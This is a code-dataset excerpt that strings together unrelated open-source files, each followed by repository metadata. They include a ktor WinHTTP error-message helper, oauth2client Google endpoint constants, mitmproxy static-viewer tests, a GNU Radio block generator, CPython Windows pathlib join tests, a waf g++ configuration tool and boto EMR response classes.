        errorCode,
        languageId,
        bufferPtr.ptr.reinterpret(),
        0.convert(),
        null
    )
    return try {
        if (readChars > 0u) {
            bufferPtr.value?.toKStringFromUtf16(readChars.convert())
        } else {
            null
        }
    } finally {
        // The second call allocated this buffer on our behalf; free it even
        // when conversion throws.
        LocalFree(bufferPtr.value)
    }
}
/**
 * Converts [size] UTF-16 code units at this pointer into a Kotlin string,
 * dropping trailing code units <= 0x20 (spaces and control characters such
 * as the CR/LF that message formatting appends).
 */
@OptIn(ExperimentalForeignApi::class)
private fun CPointer<UShortVar>.toKStringFromUtf16(size: Int): String {
    var end = size
    while (end > 0 && this[end - 1] <= 0x20u) {
        end--
    }
    return buildString(end) {
        for (index in 0 until end) {
            append(this@toKStringFromUtf16[index].toInt().toChar())
        }
    }
}
/**
 * Implements HRESULT_FROM_WIN32 macro: codes that already carry the high
 * (failure) bit pass through unchanged; plain Win32 codes are wrapped into
 * the FACILITY_WIN32 range (0x8007xxxx).
 */
private fun getHResultFromWin32Error(errorCode: UInt): UInt {
    val alreadyHResult = (errorCode and 0x80000000u) != 0u
    return when {
        alreadyHResult -> errorCode
        else -> (errorCode and 0x0000FFFFu) or 0x80070000u
    }
}
/**
 * Implements MAKELANGID macro: the sub-language occupies the bits above
 * the 10-bit primary language identifier.
 */
private fun makeLanguageId(primaryLanguageId: UInt, subLanguageId: UInt): UInt =
    (subLanguageId shl 10) or primaryLanguageId
|
kotlin
|
github
|
https://github.com/ktorio/ktor
|
ktor-client/ktor-client-winhttp/windows/src/io/ktor/client/engine/winhttp/internal/WinHttpExceptions.kt
|
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client library for using OAuth2, especially with Google APIs."""
__version__ = '1.5.2'
GOOGLE_AUTH_URI = 'https://accounts.google.com/o/oauth2/auth'
GOOGLE_DEVICE_URI = 'https://accounts.google.com/o/oauth2/device/code'
GOOGLE_REVOKE_URI = 'https://accounts.google.com/o/oauth2/revoke'
GOOGLE_TOKEN_URI = 'https://accounts.google.com/o/oauth2/token'
GOOGLE_TOKEN_INFO_URI = 'https://www.googleapis.com/oauth2/v2/tokeninfo'
|
unknown
|
codeparrot/codeparrot-clean
| ||
import json
from unittest import mock
from mitmproxy.test import taddons
from mitmproxy.test import tflow
from mitmproxy import flowfilter
from mitmproxy.tools.web.app import flow_to_json
from mitmproxy.tools.web import static_viewer
from mitmproxy.addons import save
def test_save_static(tmpdir):
    """save_static should emit index.html plus the static/ bundle, with the
    static-mode flag set in static.js."""
    tmpdir.mkdir('static')
    static_viewer.save_static(tmpdir)
    entries = tmpdir.listdir()
    assert len(entries) == 2
    assert tmpdir.join('index.html').check(file=1)
    assert tmpdir.join('static/static.js').read() == 'MITMWEB_STATIC = true;'
def test_save_filter_help(tmpdir):
    """filter-help.json must mirror flowfilter.help as a commands mapping."""
    static_viewer.save_filter_help(tmpdir)
    helpfile = tmpdir.join('/filter-help.json')
    assert helpfile.check(file=1)
    assert helpfile.read() == json.dumps({'commands': flowfilter.help})
def test_save_settings(tmpdir):
    """save_settings should write a settings.json file."""
    static_viewer.save_settings(tmpdir)
    assert tmpdir.join('/settings.json').check(file=1)
def test_save_flows(tmpdir):
    """flows.json must contain the JSON-serialised flows, in order."""
    captured = [tflow.tflow(req=True, resp=None), tflow.tflow(req=True, resp=True)]
    static_viewer.save_flows(tmpdir, captured)
    flows_file = tmpdir.join('flows.json')
    assert flows_file.check(file=1)
    assert flows_file.read() == json.dumps([flow_to_json(f) for f in captured])
@mock.patch('mitmproxy.ctx.log')
def test_save_flows_content(ctx, tmpdir):
    """Each flow gets its own directory tree with raw content (content.data)
    plus content rendered by each view (e.g. Auto.json)."""
    flows = [tflow.tflow(req=True, resp=None), tflow.tflow(req=True, resp=True)]
    # Pin time.time() to a deterministic sequence — presumably consumed when
    # naming the per-flow directories; TODO confirm against save_flows_content.
    with mock.patch('time.time', mock.Mock(side_effect=[1, 2, 2] * 4)):
        static_viewer.save_flows_content(tmpdir, flows)
    flows_path = tmpdir.join('flows')
    assert len(flows_path.listdir()) == len(flows)
    for p in flows_path.listdir():
        assert p.join('request').check(dir=1)
        assert p.join('response').check(dir=1)
        assert p.join('request/content.data').check(file=1)
        assert p.join('request/content').check(dir=1)
        assert p.join('response/content.data').check(file=1)
        assert p.join('response/content').check(dir=1)
        assert p.join('request/content/Auto.json').check(file=1)
        assert p.join('response/content/Auto.json').check(file=1)
def test_static_viewer(tmpdir):
    """End-to-end: configuring the addon with a capture file should render
    the full static site (index, static assets, per-flow data)."""
    s = static_viewer.StaticViewer()
    sa = save.Save()
    with taddons.context() as tctx:
        # Record one flow to disk first, then point the viewer at that file.
        sa.save([tflow.tflow(resp=True)], str(tmpdir.join('foo')))
        tctx.master.addons.add(s)
        tctx.configure(s, web_static_viewer=str(tmpdir), rfile=str(tmpdir.join('foo')))
        assert tmpdir.join('index.html').check(file=1)
        assert tmpdir.join('static').check(dir=1)
        assert tmpdir.join('flows').check(dir=1)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
#
# Copyright 2004,2006,2007,2008,2009 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from build_utils import expand_template, standard_dict
from build_utils_codes import *
import re
# sources and sinks
# Single-letter type codes — presumably GNU Radio's usual suffixes
# (s=short, i=int, f=float, c=complex; b=byte handled specially in
# generate()) — confirm in build_utils_codes.
ss_signatures = ['s', 'i', 'f', 'c']
# Template roots whose trailing X is replaced by one type code.
ss_roots = [
    'gr_vector_source_X',
    'gr_vector_sink_X',
    'gr_noise_source_X',
    'gr_sig_source_X',
    'gr_probe_signal_X',
    'gr_probe_signal_vX'
]
# regular blocks
# Two-letter signatures — presumably input type then output type.
reg_signatures = ['ss', 'ii', 'ff', 'cc']
reg_roots = [
    'gr_add_const_XX',
    'gr_sub_XX',
    'gr_divide_XX',
    'gr_mute_XX',
    'gr_add_const_vXX',
    'gr_multiply_const_vXX',
    'gr_integrate_XX',
    'gr_moving_average_XX',
]
# other blocks
# Each entry pairs a template root with the exact signatures to generate.
others = (
    ('gr_chunks_to_symbols_XX', ('bf', 'bc', 'sf', 'sc', 'if', 'ic')),
    ('gr_unpacked_to_packed_XX', ('bb', 'ss', 'ii')),
    ('gr_packed_to_unpacked_XX', ('bb', 'ss', 'ii')),
    ('gr_xor_XX', ('bb', 'ss', 'ii')),
    ('gr_and_XX', ('bb', 'ss', 'ii')),
    ('gr_and_const_XX', ('bb', 'ss', 'ii')),
    ('gr_or_XX', ('bb', 'ss', 'ii')),
    ('gr_not_XX', ('bb', 'ss', 'ii')),
    ('gr_sample_and_hold_XX', ('bb', 'ss', 'ii', 'ff')),
    ('gr_argmax_XX', ('fs', 'is', 'ss')),
    ('gr_max_XX', ('ff', 'ii', 'ss')),
    ('gr_peak_detector_XX', ('fb', 'ib', 'sb')),
    ('gr_multiply_XX', ('ss', 'ii')),
    ('gr_multiply_const_XX', ('ss', 'ii')),
    ('gr_add_XX', ('ss', 'cc', 'ii'))
)
def expand_h_cc_i(root, sig):
    """Instantiate the .h/.cc/.i templates for *root* with signature *sig*.

    The run of X's in *root* (e.g. 'gr_vector_sink_X') is replaced by the
    type signature to form the concrete block name.
    """
    concrete_name = re.sub('X+', sig, root)
    subst = standard_dict(concrete_name, sig)
    for extension in ('.h.t', '.cc.t', '.i.t'):
        expand_template(subst, root + extension)
def generate():
    """Expand every template/signature combination used by the core blocks."""
    # One-off special cases first (same order as before).
    expand_h_cc_i('gr_add_const_XX', 'sf')  # for MC4020
    for byte_root in ('gr_vector_sink_X', 'gr_vector_source_X',
                      'gr_probe_signal_X', 'gr_probe_signal_vX'):
        expand_h_cc_i(byte_root, 'b')
    # Cartesian products of roots and their signature lists, preserving the
    # original expansion order: sources/sinks, regular blocks, then others.
    work = [(root, ss_signatures) for root in ss_roots]
    work += [(root, reg_signatures) for root in reg_roots]
    work += list(others)
    for root, sigs in work:
        for sig in sigs:
            expand_h_cc_i(root, sig)
if __name__ == '__main__':
    # Allow running the generator directly from the command line.
    generate ()
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""
Tests for Windows-flavoured pathlib.types._JoinablePath
"""
import os
import unittest
from .support import is_pypi
from .support.lexical_path import LexicalWindowsPath
if is_pypi:
from pathlib_abc import vfspath
else:
from pathlib._os import vfspath
class JoinTestBase:
    """Shared joining/parsing tests for Windows-flavoured path classes.

    Subclasses set ``cls`` to the concrete path type under test; only
    lexical operations are exercised (no filesystem access).
    """

    def test_join(self):
        """joinpath(): drive/root handling, NTFS data streams, UNC shares."""
        P = self.cls
        p = P('C:/a/b')
        pp = p.joinpath('x/y')
        self.assertEqual(pp, P(r'C:/a/b\x/y'))
        pp = p.joinpath('/x/y')
        self.assertEqual(pp, P('C:/x/y'))
        # Joining with a different drive => the first path is ignored, even
        # if the second path is relative.
        pp = p.joinpath('D:x/y')
        self.assertEqual(pp, P('D:x/y'))
        pp = p.joinpath('D:/x/y')
        self.assertEqual(pp, P('D:/x/y'))
        pp = p.joinpath('//host/share/x/y')
        self.assertEqual(pp, P('//host/share/x/y'))
        # Joining with the same drive => the first path is appended to if
        # the second path is relative.
        pp = p.joinpath('c:x/y')
        self.assertEqual(pp, P(r'c:/a/b\x/y'))
        pp = p.joinpath('c:/x/y')
        self.assertEqual(pp, P('c:/x/y'))
        # Joining with files with NTFS data streams => the filename should
        # not be parsed as a drive letter
        pp = p.joinpath('./d:s')
        self.assertEqual(pp, P(r'C:/a/b\./d:s'))
        pp = p.joinpath('./dd:s')
        self.assertEqual(pp, P(r'C:/a/b\./dd:s'))
        pp = p.joinpath('E:d:s')
        self.assertEqual(pp, P('E:d:s'))
        # Joining onto a UNC path with no root
        pp = P('//server').joinpath('share')
        self.assertEqual(pp, P(r'//server\share'))
        pp = P('//./BootPartition').joinpath('Windows')
        self.assertEqual(pp, P(r'//./BootPartition\Windows'))

    def test_div(self):
        """The / operator — basically the same as joinpath()."""
        P = self.cls
        p = P('C:/a/b')
        self.assertEqual(p / 'x/y', P(r'C:/a/b\x/y'))
        self.assertEqual(p / 'x' / 'y', P(r'C:/a/b\x\y'))
        self.assertEqual(p / '/x/y', P('C:/x/y'))
        self.assertEqual(p / '/x' / 'y', P(r'C:/x\y'))
        # Joining with a different drive => the first path is ignored, even
        # if the second path is relative.
        self.assertEqual(p / 'D:x/y', P('D:x/y'))
        self.assertEqual(p / 'D:' / 'x/y', P('D:x/y'))
        self.assertEqual(p / 'D:/x/y', P('D:/x/y'))
        self.assertEqual(p / 'D:' / '/x/y', P('D:/x/y'))
        self.assertEqual(p / '//host/share/x/y', P('//host/share/x/y'))
        # Joining with the same drive => the first path is appended to if
        # the second path is relative.
        self.assertEqual(p / 'c:x/y', P(r'c:/a/b\x/y'))
        self.assertEqual(p / 'c:/x/y', P('c:/x/y'))
        # Joining with files with NTFS data streams => the filename should
        # not be parsed as a drive letter
        self.assertEqual(p / './d:s', P(r'C:/a/b\./d:s'))
        self.assertEqual(p / './dd:s', P(r'C:/a/b\./dd:s'))
        self.assertEqual(p / 'E:d:s', P('E:d:s'))

    def test_vfspath(self):
        """vfspath() renders the path with backslash separators."""
        p = self.cls(r'a\b\c')
        self.assertEqual(vfspath(p), 'a\\b\\c')
        p = self.cls(r'c:\a\b\c')
        self.assertEqual(vfspath(p), 'c:\\a\\b\\c')
        p = self.cls('\\\\a\\b\\')
        self.assertEqual(vfspath(p), '\\\\a\\b\\')
        p = self.cls(r'\\a\b\c')
        self.assertEqual(vfspath(p), '\\\\a\\b\\c')
        p = self.cls(r'\\a\b\c\d')
        self.assertEqual(vfspath(p), '\\\\a\\b\\c\\d')

    def test_parts(self):
        """parts: the drive (or UNC share) forms the leading component."""
        P = self.cls
        p = P(r'c:a\b')
        parts = p.parts
        self.assertEqual(parts, ('c:', 'a', 'b'))
        p = P(r'c:\a\b')
        parts = p.parts
        self.assertEqual(parts, ('c:\\', 'a', 'b'))
        p = P(r'\\a\b\c\d')
        parts = p.parts
        self.assertEqual(parts, ('\\\\a\\b\\', 'c', 'd'))

    def test_parent(self):
        """parent never walks above the anchor (drive or UNC share root)."""
        # Anchored
        P = self.cls
        p = P('z:a/b/c')
        self.assertEqual(p.parent, P('z:a/b'))
        self.assertEqual(p.parent.parent, P('z:a'))
        self.assertEqual(p.parent.parent.parent, P('z:'))
        self.assertEqual(p.parent.parent.parent.parent, P('z:'))
        p = P('z:/a/b/c')
        self.assertEqual(p.parent, P('z:/a/b'))
        self.assertEqual(p.parent.parent, P('z:/a'))
        self.assertEqual(p.parent.parent.parent, P('z:/'))
        self.assertEqual(p.parent.parent.parent.parent, P('z:/'))
        p = P('//a/b/c/d')
        self.assertEqual(p.parent, P('//a/b/c'))
        self.assertEqual(p.parent.parent, P('//a/b/'))
        self.assertEqual(p.parent.parent.parent, P('//a/b/'))

    def test_parents(self):
        """parents sequence: length, indexing, slicing and iteration."""
        # Anchored
        P = self.cls
        p = P('z:a/b')
        par = p.parents
        self.assertEqual(len(par), 2)
        self.assertEqual(par[0], P('z:a'))
        self.assertEqual(par[1], P('z:'))
        self.assertEqual(par[0:1], (P('z:a'),))
        self.assertEqual(par[:-1], (P('z:a'),))
        self.assertEqual(par[:2], (P('z:a'), P('z:')))
        self.assertEqual(par[1:], (P('z:'),))
        self.assertEqual(par[::2], (P('z:a'),))
        self.assertEqual(par[::-1], (P('z:'), P('z:a')))
        self.assertEqual(list(par), [P('z:a'), P('z:')])
        with self.assertRaises(IndexError):
            par[2]
        p = P('z:/a/b')
        par = p.parents
        self.assertEqual(len(par), 2)
        self.assertEqual(par[0], P('z:/a'))
        self.assertEqual(par[1], P('z:/'))
        self.assertEqual(par[0:1], (P('z:/a'),))
        self.assertEqual(par[0:-1], (P('z:/a'),))
        self.assertEqual(par[:2], (P('z:/a'), P('z:/')))
        self.assertEqual(par[1:], (P('z:/'),))
        self.assertEqual(par[::2], (P('z:/a'),))
        self.assertEqual(par[::-1], (P('z:/'), P('z:/a'),))
        self.assertEqual(list(par), [P('z:/a'), P('z:/')])
        with self.assertRaises(IndexError):
            par[2]
        p = P('//a/b/c/d')
        par = p.parents
        self.assertEqual(len(par), 2)
        self.assertEqual(par[0], P('//a/b/c'))
        self.assertEqual(par[1], P('//a/b/'))
        self.assertEqual(par[0:1], (P('//a/b/c'),))
        self.assertEqual(par[0:-1], (P('//a/b/c'),))
        self.assertEqual(par[:2], (P('//a/b/c'), P('//a/b/')))
        self.assertEqual(par[1:], (P('//a/b/'),))
        self.assertEqual(par[::2], (P('//a/b/c'),))
        self.assertEqual(par[::-1], (P('//a/b/'), P('//a/b/c')))
        self.assertEqual(list(par), [P('//a/b/c'), P('//a/b/')])
        with self.assertRaises(IndexError):
            par[2]

    def test_anchor(self):
        """anchor: drive plus root, or the full UNC share prefix."""
        P = self.cls
        self.assertEqual(P('c:').anchor, 'c:')
        self.assertEqual(P('c:a/b').anchor, 'c:')
        self.assertEqual(P('c:\\').anchor, 'c:\\')
        self.assertEqual(P('c:\\a\\b\\').anchor, 'c:\\')
        self.assertEqual(P('\\\\a\\b\\').anchor, '\\\\a\\b\\')
        self.assertEqual(P('\\\\a\\b\\c\\d').anchor, '\\\\a\\b\\')

    def test_name(self):
        """name: empty for bare drives and UNC share roots."""
        P = self.cls
        self.assertEqual(P('c:').name, '')
        self.assertEqual(P('c:/').name, '')
        self.assertEqual(P('c:a/b').name, 'b')
        self.assertEqual(P('c:/a/b').name, 'b')
        self.assertEqual(P('c:a/b.py').name, 'b.py')
        self.assertEqual(P('c:/a/b.py').name, 'b.py')
        self.assertEqual(P('//My.py/Share.php').name, '')
        self.assertEqual(P('//My.py/Share.php/a/b').name, 'b')

    def test_stem(self):
        """stem: the name without its last suffix; dotfiles keep their name."""
        P = self.cls
        self.assertEqual(P('c:').stem, '')
        self.assertEqual(P('c:..').stem, '..')
        self.assertEqual(P('c:/').stem, '')
        self.assertEqual(P('c:a/b').stem, 'b')
        self.assertEqual(P('c:a/b.py').stem, 'b')
        self.assertEqual(P('c:a/.hgrc').stem, '.hgrc')
        self.assertEqual(P('c:a/.hg.rc').stem, '.hg')
        self.assertEqual(P('c:a/b.tar.gz').stem, 'b.tar')
        self.assertEqual(P('c:a/trailing.dot.').stem, 'trailing.dot')

    def test_suffix(self):
        """suffix: the last dotted extension, '' for dotfiles and shares."""
        P = self.cls
        self.assertEqual(P('c:').suffix, '')
        self.assertEqual(P('c:/').suffix, '')
        self.assertEqual(P('c:a/b').suffix, '')
        self.assertEqual(P('c:/a/b').suffix, '')
        self.assertEqual(P('c:a/b.py').suffix, '.py')
        self.assertEqual(P('c:/a/b.py').suffix, '.py')
        self.assertEqual(P('c:a/.hgrc').suffix, '')
        self.assertEqual(P('c:/a/.hgrc').suffix, '')
        self.assertEqual(P('c:a/.hg.rc').suffix, '.rc')
        self.assertEqual(P('c:/a/.hg.rc').suffix, '.rc')
        self.assertEqual(P('c:a/b.tar.gz').suffix, '.gz')
        self.assertEqual(P('c:/a/b.tar.gz').suffix, '.gz')
        self.assertEqual(P('c:a/trailing.dot.').suffix, '.')
        self.assertEqual(P('c:/a/trailing.dot.').suffix, '.')
        self.assertEqual(P('//My.py/Share.php').suffix, '')
        self.assertEqual(P('//My.py/Share.php/a/b').suffix, '')

    def test_suffixes(self):
        """suffixes: every dotted extension of the name, in order."""
        P = self.cls
        self.assertEqual(P('c:').suffixes, [])
        self.assertEqual(P('c:/').suffixes, [])
        self.assertEqual(P('c:a/b').suffixes, [])
        self.assertEqual(P('c:/a/b').suffixes, [])
        self.assertEqual(P('c:a/b.py').suffixes, ['.py'])
        self.assertEqual(P('c:/a/b.py').suffixes, ['.py'])
        self.assertEqual(P('c:a/.hgrc').suffixes, [])
        self.assertEqual(P('c:/a/.hgrc').suffixes, [])
        self.assertEqual(P('c:a/.hg.rc').suffixes, ['.rc'])
        self.assertEqual(P('c:/a/.hg.rc').suffixes, ['.rc'])
        self.assertEqual(P('c:a/b.tar.gz').suffixes, ['.tar', '.gz'])
        self.assertEqual(P('c:/a/b.tar.gz').suffixes, ['.tar', '.gz'])
        self.assertEqual(P('//My.py/Share.php').suffixes, [])
        self.assertEqual(P('//My.py/Share.php/a/b').suffixes, [])
        self.assertEqual(P('c:a/trailing.dot.').suffixes, ['.dot', '.'])
        self.assertEqual(P('c:/a/trailing.dot.').suffixes, ['.dot', '.'])

    def test_with_name(self):
        """with_name(): replaces the final component; rejects anchored names."""
        P = self.cls
        self.assertEqual(P(r'c:a\b').with_name('d.xml'), P(r'c:a\d.xml'))
        self.assertEqual(P(r'c:\a\b').with_name('d.xml'), P(r'c:\a\d.xml'))
        self.assertEqual(P(r'c:a\Dot ending.').with_name('d.xml'), P(r'c:a\d.xml'))
        self.assertEqual(P(r'c:\a\Dot ending.').with_name('d.xml'), P(r'c:\a\d.xml'))
        self.assertRaises(ValueError, P(r'c:a\b').with_name, r'd:\e')
        self.assertRaises(ValueError, P(r'c:a\b').with_name, r'\\My\Share')

    def test_with_stem(self):
        """with_stem(): replaces the name while keeping the suffix."""
        P = self.cls
        self.assertEqual(P('c:a/b').with_stem('d'), P('c:a/d'))
        self.assertEqual(P('c:/a/b').with_stem('d'), P('c:/a/d'))
        self.assertEqual(P('c:a/Dot ending.').with_stem('d'), P('c:a/d.'))
        self.assertEqual(P('c:/a/Dot ending.').with_stem('d'), P('c:/a/d.'))
        self.assertRaises(ValueError, P('c:a/b').with_stem, 'd:/e')
        self.assertRaises(ValueError, P('c:a/b').with_stem, '//My/Share')

    def test_with_suffix(self):
        """with_suffix(): replaces the suffix; rejects malformed suffixes."""
        P = self.cls
        self.assertEqual(P('c:a/b').with_suffix('.gz'), P('c:a/b.gz'))
        self.assertEqual(P('c:/a/b').with_suffix('.gz'), P('c:/a/b.gz'))
        self.assertEqual(P('c:a/b.py').with_suffix('.gz'), P('c:a/b.gz'))
        self.assertEqual(P('c:/a/b.py').with_suffix('.gz'), P('c:/a/b.gz'))
        # Path doesn't have a "filename" component.
        self.assertRaises(ValueError, P('').with_suffix, '.gz')
        self.assertRaises(ValueError, P('/').with_suffix, '.gz')
        self.assertRaises(ValueError, P('//My/Share').with_suffix, '.gz')
        # Invalid suffix.
        self.assertRaises(ValueError, P('c:a/b').with_suffix, 'gz')
        self.assertRaises(ValueError, P('c:a/b').with_suffix, '/')
        self.assertRaises(ValueError, P('c:a/b').with_suffix, '\\')
        self.assertRaises(ValueError, P('c:a/b').with_suffix, 'c:')
        self.assertRaises(ValueError, P('c:a/b').with_suffix, '/.gz')
        self.assertRaises(ValueError, P('c:a/b').with_suffix, '\\.gz')
        self.assertRaises(ValueError, P('c:a/b').with_suffix, 'c:.gz')
        self.assertRaises(ValueError, P('c:a/b').with_suffix, 'c/d')
        self.assertRaises(ValueError, P('c:a/b').with_suffix, 'c\\d')
        self.assertRaises(ValueError, P('c:a/b').with_suffix, '.c/d')
        self.assertRaises(ValueError, P('c:a/b').with_suffix, '.c\\d')
        self.assertRaises(TypeError, P('c:a/b').with_suffix, None)
class LexicalWindowsPathJoinTest(JoinTestBase, unittest.TestCase):
    # Pure lexical implementation from the test support package; runnable
    # on any platform.
    cls = LexicalWindowsPath
if not is_pypi:
    # The stdlib flavours are only exercised when running against CPython's
    # own pathlib (the PyPI pathlib_abc distribution does not ship them).
    from pathlib import PureWindowsPath, WindowsPath

    class PureWindowsPathJoinTest(JoinTestBase, unittest.TestCase):
        cls = PureWindowsPath

    if os.name == 'nt':
        # WindowsPath can only be instantiated on Windows itself.
        class WindowsPathJoinTest(JoinTestBase, unittest.TestCase):
            cls = WindowsPath

if __name__ == "__main__":
    unittest.main()
|
python
|
github
|
https://github.com/python/cpython
|
Lib/test/test_pathlib/test_join_windows.py
|
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import os,sys
from waflib import Configure,Options,Utils
from waflib.Tools import ccroot,ar
from waflib.Configure import conf
@conf
def find_gxx(conf):
    # Locate the C++ compiler (g++, falling back to c++), probe its version
    # with the shared gcc detection helper, and record it in the env.
    cxx = conf.find_program(['g++', 'c++'], var='CXX')
    cxx = conf.cmd_to_list(cxx)
    conf.get_cc_version(cxx, gcc=True)
    conf.env.CXX_NAME = 'gcc'
    conf.env.CXX = cxx
@conf
def gxx_common_flags(conf):
    # Baseline g++ flags shared by all platforms; the gxx_modifier_*
    # functions below override individual entries per DEST_OS.
    v = conf.env
    v['CXX_SRC_F'] = []
    v['CXX_TGT_F'] = ['-c', '-o']
    # Link with the compiler driver unless a linker was set explicitly.
    if not v['LINK_CXX']:
        v['LINK_CXX'] = v['CXX']
    v['CXXLNK_SRC_F'] = []
    v['CXXLNK_TGT_F'] = ['-o']
    # Flag templates: %s is substituted with the path or name.
    v['CPPPATH_ST'] = '-I%s'
    v['DEFINES_ST'] = '-D%s'
    v['LIB_ST'] = '-l%s'
    v['LIBPATH_ST'] = '-L%s'
    v['STLIB_ST'] = '-l%s'
    v['STLIBPATH_ST'] = '-L%s'
    v['RPATH_ST'] = '-Wl,-rpath,%s'
    v['SONAME_ST'] = '-Wl,-h,%s'
    v['SHLIB_MARKER'] = '-Wl,-Bdynamic'
    v['STLIB_MARKER'] = '-Wl,-Bstatic'
    # Output file naming patterns per target kind.
    v['cxxprogram_PATTERN'] = '%s'
    v['CXXFLAGS_cxxshlib'] = ['-fPIC']
    v['LINKFLAGS_cxxshlib'] = ['-shared']
    v['cxxshlib_PATTERN'] = 'lib%s.so'
    v['LINKFLAGS_cxxstlib'] = ['-Wl,-Bstatic']
    v['cxxstlib_PATTERN'] = 'lib%s.a'
    # macOS loadable bundles.
    v['LINKFLAGS_MACBUNDLE'] = ['-bundle', '-undefined', 'dynamic_lookup']
    v['CXXFLAGS_MACBUNDLE'] = ['-fPIC']
    v['macbundle_PATTERN'] = '%s.bundle'
@conf
def gxx_modifier_win32(conf):
    # Windows (MinGW): .exe/.dll naming, import library generation, and
    # auto-import of DLL symbols.
    v = conf.env
    v['cxxprogram_PATTERN'] = '%s.exe'
    v['cxxshlib_PATTERN'] = '%s.dll'
    v['implib_PATTERN'] = 'lib%s.dll.a'
    v['IMPLIB_ST'] = '-Wl,--out-implib,%s'
    # Clear the -fPIC set in gxx_common_flags; not used for DLLs here.
    v['CXXFLAGS_cxxshlib'] = []
    v.append_value('LINKFLAGS', ['-Wl,--enable-auto-import'])
@conf
def gxx_modifier_cygwin(conf):
    # Cygwin builds start from the win32 settings, then adjust DLL naming
    # and image-base handling.
    gxx_modifier_win32(conf)
    v = conf.env
    v['cxxshlib_PATTERN'] = 'cyg%s.dll'
    v.append_value('LINKFLAGS_cxxshlib', ['-Wl,--enable-auto-image-base'])
    v['CXXFLAGS_cxxshlib'] = []
@conf
def gxx_modifier_darwin(conf):
    # macOS: dylib naming/versioning, framework flags, architecture flags.
    v = conf.env
    v['CXXFLAGS_cxxshlib'] = ['-fPIC', '-compatibility_version', '1', '-current_version', '1']
    v['LINKFLAGS_cxxshlib'] = ['-dynamiclib']
    v['cxxshlib_PATTERN'] = 'lib%s.dylib'
    v['FRAMEWORKPATH_ST'] = '-F%s'
    v['FRAMEWORK_ST'] = ['-framework']
    v['ARCH_ST'] = ['-arch']
    v['LINKFLAGS_cxxstlib'] = []
    # Clear GNU-ld specific markers that do not apply to Apple's linker.
    v['SHLIB_MARKER'] = []
    v['STLIB_MARKER'] = []
    v['SONAME_ST'] = []
@conf
def gxx_modifier_aix(conf):
    # AIX: enable runtime linking (-brtl) for programs and shared objects.
    v = conf.env
    v['LINKFLAGS_cxxprogram'] = ['-Wl,-brtl']
    v['LINKFLAGS_cxxshlib'] = ['-shared', '-Wl,-brtl,-bexpfull']
    v['SHLIB_MARKER'] = []
@conf
def gxx_modifier_hpux(conf):
    """HP-UX specific adjustments for g++: .sl shared-library suffix and
    position-independent code for shared objects.

    Fix: the original set ``CFLAGS_cxxshlib`` (the C variant), while every
    other modifier in this file and ``gxx_common_flags`` use
    ``CXXFLAGS_cxxshlib`` — so ``-fPIC -DPIC`` were never applied when
    compiling C++ shared libraries on HP-UX.
    """
    v = conf.env
    v['SHLIB_MARKER'] = []
    v['STLIB_MARKER'] = '-Bstatic'
    v['CXXFLAGS_cxxshlib'] = ['-fPIC', '-DPIC']
    v['cxxshlib_PATTERN'] = 'lib%s.sl'
@conf
def gxx_modifier_platform(conf):
    # Dispatch to gxx_modifier_<DEST_OS> when such a method exists on the
    # configuration context; unknown platforms keep the common flags.
    gxx_modifier_func = getattr(conf, 'gxx_modifier_' + conf.env.DEST_OS, None)
    if gxx_modifier_func:
        gxx_modifier_func()
def configure(conf):
    # Standard waf tool entry point: detect g++ and ar, then install the
    # common flags, platform tweaks, and the generic C++ task helpers.
    conf.find_gxx()
    conf.find_ar()
    conf.gxx_common_flags()
    conf.gxx_modifier_platform()
    conf.cxx_load_tools()
    conf.cxx_add_flags()
    conf.link_add_flags()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright (c) 2010 Spotify AB
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from boto.emr.emrobject import EmrObject
from boto.resultset import ResultSet
class RunJobFlowResponse(EmrObject):
    """Response to a RunJobFlow call; carries only the new job flow id."""

    # Simple text elements picked up from the XML response.
    Fields = {'JobFlowId'}
class Arg(EmrObject):
    """A single step argument parsed from an ``<Args><member>`` element."""

    def __init__(self, connection=None):
        # Element text; filled in by endElement during SAX parsing.
        self.value = None

    def endElement(self, name, value, connection):
        self.value = value
class Step(EmrObject):
    """One step of a job flow as reported in an EMR response."""

    # Simple text elements stored directly as attributes by the parser.
    Fields = {
        'Name',
        'ActionOnFailure',
        'CreationDateTime',
        'StartDateTime',
        'EndDateTime',
        'LastStateChangeReason',
        'State',
    }

    def __init__(self, connection=None):
        self.connection = connection
        # Populated with a ResultSet of Arg when an <Args> element is seen.
        self.args = None

